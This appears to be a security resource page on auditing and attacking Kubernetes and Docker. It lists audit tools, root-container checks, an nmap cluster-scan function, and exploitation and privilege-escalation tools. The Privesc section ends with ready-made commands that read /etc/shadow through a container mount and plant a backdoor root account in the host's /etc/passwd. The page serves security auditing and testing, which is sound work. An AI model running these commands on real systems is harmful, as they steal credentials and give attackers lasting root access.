Resources

Audit¶

Automated¶

Tool	Description
kube-bench	Checks whether Kubernetes is deployed according to security best practices kube-bench-exporter can export reports to remote targets like S3
kube-hunter	Hunt for security weaknesses in Kubernetes clusters (even remote) Usage: From docker: `docker run -it --rm --network host aquasec/kube-hunter` From kubectl: `kubectl run --rm -it kube-hunter --image=aquasec/kube-hunter --restart=Never --overrides="{ \"apiVersion\": \"v1\", \"spec\": { \"hostNetwork\": true } }"`
kubeaudit	Audit clusters against common security controls Run from kubectl (as plugin): `kubectl audit all`
mkit	Managed Kubernetes Inspection Tool that validates several common security-related configuration settings of managed Kubernetes clusters It runs entirely from a local Docker container and queries your cloud provider's APIs and the Kubernetes API to determine if certain misconfigurations are found
starboard	Integrates security tools into a Kubernetes environment, so that users can find and view the risks that relate to different resources in a Kubernetes-native way kubectl-compatible command-line tool and an Octant plug-in

Manual¶

Containers Running as Privileged User¶

On docker (all containers):

# The command returns container username or user ID
# If it is blank the container is running as root
$ docker ps --quiet --all | xargs docker inspect --format '{{ .Id }}: User={{ .Config.User }}'

On docker:

$ sudo docker ps
$ sudo docker exec -it <container id> whoami

On kubernetes:

# GET CONTAINERS RUNNING IN POD
$ kubectl describe pod/test-pod

# ACCESS CONTAINER
$ kubectl exec -it test-pod --container denko -- /bin/bash
root@test-pod:/usr/src/app# id
uid=0(root) gid=0(root) groups=0(root)

nmap-kube¶

Nmap alias for scanning a cluster

Usage:

nmap-kube () {
   nmap --open -T4 -A -v -Pn -p 443,2379,4194,6782-6784,6443,8443,8080,9099,10250,10255,10256 "${@}"
}
nmap-kube-discover () {
  local LOCAL_RANGE=$(ip a | awk '/eth0$/{print $2}' | sed 's,[0-9][0-9]*/.*,*,');
  local SERVER_RANGES=" ";
  SERVER_RANGES+="10.0.0.1 ";
  SERVER_RANGES+="10.0.1.* ";
  SERVER_RANGES+="10.*.0-1.* ";
  nmap-kube ${SERVER_RANGES} "${LOCAL_RANGE}"
}
nmap-kube-discover

Exploitation¶

Tool	Description
amicontained	Find out what container runtime is being used as well as features available Usage: `$ docker run --rm -it r.j3ss.co/amicontained` `$ docker run --rm -it --pid host r.j3ss.co/amicontained` `$ docker run --rm -it --security-opt "apparmor=unconfined" r.j3ss.co/amicontained`
go-pillage-registries	Takes a Docker registry and pillages the manifest and configuration for each image in its catalog
botb	Container analysis and exploitation tool Allows to: Exploit common container vulnerabilities Perform common container post exploitation actions Provide capability when certain tools or binaries are not available in the Container Use BOtB's capabilities with CI/CD technologies to test container deployments Perform the above in either a manual or automated approach

Privesc¶

Tool	Description
kubeletmein	Exploit cloud provider kubelet TLS bootstrapping techniques and escalate privileges within a Kubernetes cluster Kubeletmein - A tool for abusing kubelet credentials
docker-rootplease	Gives you root on the hostOS, if you're a member of the `docker` group Usage: `docker run -v /:/hostOS -i -t chrisfosterelli/rootplease`
docker-rootshell	Abuses membership in the `docker` group to drop a root shell in the current working directory
deepce	Docker Enumeration, Escalation of Privileges and Container Escapes
Manual	Read file: `docker run -v /etc/shadow:/docker/hashedpasswords -d postgres` Adding a backdoor (if in docker group): `docker run -it --rm -v $PWD:/mnt bash` `$ echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd` Other techniques: https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/